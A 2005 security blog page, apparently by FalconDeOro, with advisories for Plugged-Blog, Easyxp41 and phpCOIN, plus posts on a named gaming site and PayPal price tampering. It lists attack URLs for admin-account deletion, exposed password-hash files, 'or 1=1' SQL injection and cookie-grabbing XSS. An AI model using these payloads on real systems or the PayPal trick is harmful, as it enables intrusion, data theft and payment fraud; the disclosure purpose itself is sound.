###############################
Plugged-Blog XSS and SQL-Injection flaw & Remove Admin
vendor url: http://www.pluggedout.com
advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html
vendor notify: yes exploit available: yes
###############################
Plugged-Blog is a CMS WebBlog-Portal content management systen, theinstall es very easy to use and configure,it's great to use, it'sspeed.It's have a Readme and very well It's solution to all WebMasterand normal users to level down.
#########versions#########
0.4.8
#########Solution#########
No solution at this time !
!#########Timeline########
Discovered: 29-07-2005
vendor notify: 29-07-2005
disclosure: 30-07-2005
####### Bad Definition ########
-Bad definition to variable userid=
-Bad definition to variable contentid=
-Bad definition to variable templateid=
-Bad definition to variable doctupeid=
-Bad definition to variable list_from=
-Bad definition to variable usertypeid=
-Bad definition to variable templateid=
-bad definition to variable contenttypeid=
http://[victim]/admin.php?action=user_del&userid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=content_del&contentid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_edit&templateid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=document_add&doctypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=user_list&list_from=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=usertype_edit&usertypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]
What do you want remove if it doesen't have nothing? :D
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]
What do you want remove if it doesn't have nothing? :p
######## How remove Admin ########
For default, the users Admin and Guest exist. And the userid to admin is 2, and the userid for the guest is 1.If you want to remove Admin, you write on browser :
http://[victim]/admin.php?action=user_del&userid=2
If you want to remove Guest, you write on browser :
http://[victim]/admin.php?action=user_del&userid=2
Observation: You require login for the user Admin.
##################Proof of comcepts##################
In the messages we want write XSS code and we see in WebBlog Home.If you writes message XSS Code, in the url :
####### XSS message #######
http://[victim]/admin.php?action=report_statistics&report=visitors
http://[victim]/admin.php?action=content_list
http://[victim]/admin.php?action=report_statistics&report=page_hits
Select the ID to visit (only if he see the message XSS) and we seethe XSS.
#########
XSS
#########
http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code]
http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]
#########
Observation
#########
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]
What do you want remove, if it doesen't have nothing? :D
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]
What do you want remove if it doesn't have nothing? :p
###########
Errors SQl & Sql Injection
###########
If you write XSS code in the url :
http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code]
Or you change the definition to contenttypeid=[change-the-valor]
you can see the message error:
Problem with SQL
[SELECTnContentSecurityId,cms_ContentSecurity.nUserTypeId,
cms_ContentSecurity.nContentTypeId,cUserTypeName,cView,cAdd,cEdit,cDelete,
cApproveFROM cms_ContentSecurity INNER JOIN cms_UserType ONcms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId WHEREnContentTypeId= ORDER BY cUserTypeName]
And the table to message :
Problem with SQL [SELECT * FROM cms_ContentTypeProperties WHEREnContentTypeId= ORDER BY nSortIndex]
You can see the Tables and fields.
If you write XSS code in the url to up, you can see the message error:Could not find record [SELECT * FROM cms_Content WHERE nContentId=;]
And you have the name to the Table and the field affected.
http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection]
And you see these error:SELECT COUNT(nStatisticId) AS nCount,MAX(dView) ASdLastView,cSessionId,cIPAddress FROM cms_Statistics GROUP BYcSessionId,cIPAddress ORDER BY dLastView DESC LIMIT or 1=1,20
######################## €nd ##########################
Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
Atentamente:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com/
sábado, julio 30, 2005
viernes, julio 29, 2005
XSS flaws and data disclosure in Easyxp41
################################################
XSS flaws and data dliclosure in Easyxp41
vendor url: http://www.easypx41.be/
advisory: http://falcondeoro.blogspot.com/2005/07/
xss-flaws-and-data-disclosure-in.html
vendor notify: Yes exploit available: Yes
##################################################
Easyxp41 es a free script to make web portal.Yo can run it very easy.Easyxp41 , contains very flaw that open direct files and you can seethe contain to it.
###########
verions
###########
CMS full
CMS test
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 26-07-2005
Vendor notify:29-07-2005
Disclosure:29-07-2005
############
proof of concepts
############
################################################
information disclosure in /forum/ folder:
#########################################
http://[victim]/modules/forum/cfg/
http://[victim]/modules/forum/db/
http://[victim]/modules/forum/msg/
http://[victim]/modules/forum/admin/index.php
http://[victim]/modules/forum/msg/1103495330.dat
#############
information disclosure in /login/ folder:
#############
http://[victim]/modules/login/
http://[victim]/modules/login/login.php
http://[victim]/modules/login/admin/option.php
http://[victim]/modules/login/cfg/modules.cfg
http://[victim]/cfg/config.cfg
http://[victim]/mesdocuments/
http://[victim]/modules/news/
#############
Cross-site scripting & variable injections.
#############
http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20démonstration.&msg=1103495330.dat&pgfull[variable-injection]
http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
Bad definition to variable forum = , with the flaw to up :modules/forum/msg we can read the messages without be identify in PHP:
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull
##################
Name to file .dat to contain messages forum disclosure
http://[victim]/modules/forum/db/rep.db
##########################
User and password hash disclosure
http://[victim]modules/login/db/login.db
##########################
user email disclosure
modules/login/db/login.db
############################# €nd ##########################
Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
Aentamente:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com
XSS flaws and data dliclosure in Easyxp41
vendor url: http://www.easypx41.be/
advisory: http://falcondeoro.blogspot.com/2005/07/
xss-flaws-and-data-disclosure-in.html
vendor notify: Yes exploit available: Yes
##################################################
Easyxp41 es a free script to make web portal.Yo can run it very easy.Easyxp41 , contains very flaw that open direct files and you can seethe contain to it.
###########
verions
###########
CMS full
CMS test
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 26-07-2005
Vendor notify:29-07-2005
Disclosure:29-07-2005
############
proof of concepts
############
################################################
information disclosure in /forum/ folder:
#########################################
http://[victim]/modules/forum/cfg/
http://[victim]/modules/forum/db/
http://[victim]/modules/forum/msg/
http://[victim]/modules/forum/admin/index.php
http://[victim]/modules/forum/msg/1103495330.dat
#############
information disclosure in /login/ folder:
#############
http://[victim]/modules/login/
http://[victim]/modules/login/login.php
http://[victim]/modules/login/admin/option.php
http://[victim]/modules/login/cfg/modules.cfg
http://[victim]/cfg/config.cfg
http://[victim]/mesdocuments/
http://[victim]/modules/news/
#############
Cross-site scripting & variable injections.
#############
http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20démonstration.&msg=1103495330.dat&pgfull[variable-injection]
http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
Bad definition to variable forum = , with the flaw to up :modules/forum/msg we can read the messages without be identify in PHP:
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull
##################
Name to file .dat to contain messages forum disclosure
http://[victim]/modules/forum/db/rep.db
##########################
User and password hash disclosure
http://[victim]modules/login/db/login.db
##########################
user email disclosure
modules/login/db/login.db
############################# €nd ##########################
Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
Aentamente:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com
viernes, julio 22, 2005
SQL Injection & XSS en la web de: counter-adiction.com
Ante todo, decir que me resultó casi IMPOSIBLE ponerme en contacto con los administradores, no tienen email de contacto? si una web con 20 usuarios on-line no tiene email de contacto , y en el canal del quakenet nadie respondia, dejé varios mensajes, en querys y en mensajes generales. Espero que lo hayais visto.
URL afectada: http://counter-adiction.com
Tipo de fallo: Sql Injection & XSS
Bugs descubridos: FalconDeOro & Lostmon
Adjuntado al descubrimiento: Clan DeadZone : http://deadzone.de.funpic.org/
Empezemos por el fallo XSS:
http://www.counter-adiction.com/usuario.php?idNick=[Codigo-XSS]
Los fallos de SQL Injection:
http://www.counter-adiction.com/galeria.php?idGaleria=[SQL-Injection]
http://www.counter-adiction.com/downloads.php?idCategoria=[SQL-Injection]
http://www.counter-adiction.com/descargar.php?idArchivo=[SQL-Injection]
Curiosidades sin importancia (no tienen peligro, solo son curiosidades) :
http://www.counter-adiction.com/not_ver.php?idNoticia=[Canviar-valor]
Agradecimientos:
Gracias Lostmon por ser paciente conmigo y enseñarme ( su webblog: http://lostmon.blogspot.com/ )
Gracias al clan DeadZone : http://deadzone.de.funpic.org entre ellos: Soed , icmp , kelder honk y brink.
Especial agradecimiento a NewCastle , Lmc y los antiguos de dismarking
URL afectada: http://counter-adiction.com
Tipo de fallo: Sql Injection & XSS
Bugs descubridos: FalconDeOro & Lostmon
Adjuntado al descubrimiento: Clan DeadZone : http://deadzone.de.funpic.org/
Empezemos por el fallo XSS:
http://www.counter-adiction.com/usuario.php?idNick=[Codigo-XSS]
Los fallos de SQL Injection:
http://www.counter-adiction.com/galeria.php?idGaleria=[SQL-Injection]
http://www.counter-adiction.com/downloads.php?idCategoria=[SQL-Injection]
http://www.counter-adiction.com/descargar.php?idArchivo=[SQL-Injection]
Curiosidades sin importancia (no tienen peligro, solo son curiosidades) :
http://www.counter-adiction.com/not_ver.php?idNoticia=[Canviar-valor]
Agradecimientos:
Gracias Lostmon por ser paciente conmigo y enseñarme ( su webblog: http://lostmon.blogspot.com/ )
Gracias al clan DeadZone : http://deadzone.de.funpic.org entre ellos: Soed , icmp , kelder honk y brink.
Especial agradecimiento a NewCastle , Lmc y los antiguos de dismarking
miércoles, junio 01, 2005
PayPal permite cambiar los precios
Este fallo sirve para TODOS los vendedores que usen paypal.
El fallo está confirmado por PayPal y tienen conciencia de este.
En el caso de edonkey, por ejemplo , la url original es asi:
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=register@edonkey2000.com&item_name=eDonkey%20Pro&item_number=1&amount=19.95&no_shipping=1&return=http%3A%2F%2Fwww.overnet.com%2Fpaypal.php?cancel_return=http%3A%2F%2Fwww.edonkey2000.com&submit.x=70&submit.y=15
Nosotros , podemos cambiar los datos de la url de esta forma:
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=[EMAIL-VENDEDOR&item_name=[NOMBRE-DEL-PRODUCTO&item_number=1&amount=0.01&no_shipping=1&return=[URL-QUE-VUELVE]%2Fpaypal.php?cancel_return=http%3A%2F%2F[SITIO-DEL-PRODUCTO]&submit.x=70&submit.y=15
Puedes cambiarle la cuenta de email , el precio , la url , lo que vale el producto...
Mi email : falcondeoro@gmail.com
Gracias Lostmon por lo que tu ya sabes ;)
El fallo está confirmado por PayPal y tienen conciencia de este.
En el caso de edonkey, por ejemplo , la url original es asi:
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=register@edonkey2000.com&item_name=eDonkey%20Pro&item_number=1&amount=19.95&no_shipping=1&return=http%3A%2F%2Fwww.overnet.com%2Fpaypal.php?cancel_return=http%3A%2F%2Fwww.edonkey2000.com&submit.x=70&submit.y=15
Nosotros , podemos cambiar los datos de la url de esta forma:
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=[EMAIL-VENDEDOR&item_name=[NOMBRE-DEL-PRODUCTO&item_number=1&amount=0.01&no_shipping=1&return=[URL-QUE-VUELVE]%2Fpaypal.php?cancel_return=http%3A%2F%2F[SITIO-DEL-PRODUCTO]&submit.x=70&submit.y=15
Puedes cambiarle la cuenta de email , el precio , la url , lo que vale el producto...
Mi email : falcondeoro@gmail.com
Gracias Lostmon por lo que tu ya sabes ;)
sábado, marzo 05, 2005
Injeccion de comandos y XSS con phpcoin
phpCOIN es un software libre , utilizado para webs de hosting resellers , ...
bueno, directamente os lo copio de mi amigo lostmon , lo vereis más claramente:
############sql injection:############
dislose some sql data...
http://[target]phpcoin/mod.php?mod=siteinfo&id=1'ummm them ...
http://[target]phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://[target]phpcoin/mod.php?mod=articles&mode=list&dtopic_id=1%20or%201=1
http://[target]phpcoin/mod.php?mod=orders&mode=view&ord_id=1002%20or%201=1
http://[target]phpcoin/mod.php?mod=domains&mode=view&dom_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=invoices&mode=view&invc_id=1002%20or%201=1
#################cross site scripting#################
http://[target]phpcoin/mod.php?mod=helpdesk&mode=new%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=user&o=login&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=admin&o=login%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
Other script are subceptibles to injection html or javascript code...
##################versions afected
##################1.2.01.2.1b1.2.1
##########Solution :
##########no solution was avaible at this time look for vendor information or for new release versions.
Creditos:
atentamente:Lostmon (lostmon@gmail.com)Thnx to estrella to be my ligthThnx to all who belibed in meWeb-Blog: http://lostmon.blogspot.com La curiosidad es lo que hace mover la mente....
-------------------------------------------------------------------
Opinión personal:
Muchas gracias Lostmon por darnos a conocer este valioso bug de phpCOIN , espero que sigas publicando muchos más de este tipo :D
bueno, directamente os lo copio de mi amigo lostmon , lo vereis más claramente:
############sql injection:############
dislose some sql data...
http://[target]phpcoin/mod.php?mod=siteinfo&id=1'ummm them ...
http://[target]phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://[target]phpcoin/mod.php?mod=articles&mode=list&dtopic_id=1%20or%201=1
http://[target]phpcoin/mod.php?mod=orders&mode=view&ord_id=1002%20or%201=1
http://[target]phpcoin/mod.php?mod=domains&mode=view&dom_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=invoices&mode=view&invc_id=1002%20or%201=1
#################cross site scripting#################
http://[target]phpcoin/mod.php?mod=helpdesk&mode=new%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=user&o=login&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=admin&o=login%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
Other script are subceptibles to injection html or javascript code...
##################versions afected
##################1.2.01.2.1b1.2.1
##########Solution :
##########no solution was avaible at this time look for vendor information or for new release versions.
Creditos:
atentamente:Lostmon (lostmon@gmail.com)Thnx to estrella to be my ligthThnx to all who belibed in meWeb-Blog: http://lostmon.blogspot.com La curiosidad es lo que hace mover la mente....
-------------------------------------------------------------------
Opinión personal:
Muchas gracias Lostmon por darnos a conocer este valioso bug de phpCOIN , espero que sigas publicando muchos más de este tipo :D
Suscribirse a:
Entradas (Atom)